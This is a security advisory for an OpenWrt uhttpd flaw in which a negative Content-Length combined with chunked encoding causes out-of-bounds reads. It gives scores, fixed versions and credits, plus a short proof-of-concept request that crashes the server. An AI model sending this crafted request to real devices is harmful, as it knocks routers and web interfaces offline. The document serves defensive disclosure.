5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.001 Low
EPSS
Percentile
45.8%
DESCRIPTION
An invalid data access can be triggered with an HTTP POST request to a CGI script specifying both Transfer-Encoding: chunked
and a large Content-Length
which exceeds 2^31 and is interpreted as a signed negative number.
The negative content length is assigned to rβcontent_length
in client_parse_header
and passed as a negative read length to ustream_consume
in client_poll_post_data
which will set the internal ustream buffer pointer to an invalid address, causing out of bounds memory reads later on in the code flow.
A similar implicit unsigned to signed conversion happens when parsing chunk sizes emitted by a CGI program.
*[HTTP]: Hypertext Transfer Protocol
REQUIREMENTS
In order to exploit this vulnerability, a malicious attacker would need to provide specially crafted HTTP POST request to uhttpd. Something like following:
$ cat crash.poc # crlf line endings, ends with 3 line endings
POST /cgi-bin/luci HTTP/1.0
Transfer-Encoding: chunked
Content-Length: -100000
$ ./uhttpd -f -p 127.0.0.1:8000 & # start uhttpd
$ nc 127.0.0.1 8000 < crash.poc # send POC to uhttpd
[1]+ Segmentation fault (core dumped)
*[HTTP]: Hypertext Transfer Protocol
MITIGATIONS
To fix this issue, update the affected uhttpd package using the command below.
opkg update; opkg upgrade uhttpd
The fix is contained in the following and later versions:
OpenWrt master: 2019-12-22 reboot-11760-gf34f9a414dd3
OpenWrt 19.07: 2019-12-22 v19.07.0-rc2-32-g414ea309271e
OpenWrt 18.06: 2019-12-22 v18.06.5-40-gb90156361152
AFFECTED VERSIONS
To our knowledge, OpenWrt versions 18.06.0 to 18.06.5 are affected. The fixed packages are integrated in the OpenWrt 18.06.6, OpenWrt 19.07.0 and subsequent releases. Older versions of OpenWrt (e.g. OpenWrt 15.05 and LEDE 17.01) are end of life and not supported any more.
CREDITS
The issue was discovered by Jan-Niklas Sohn and fixed by Jo-Philipp Wich.
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.001 Low
EPSS
Percentile
45.8%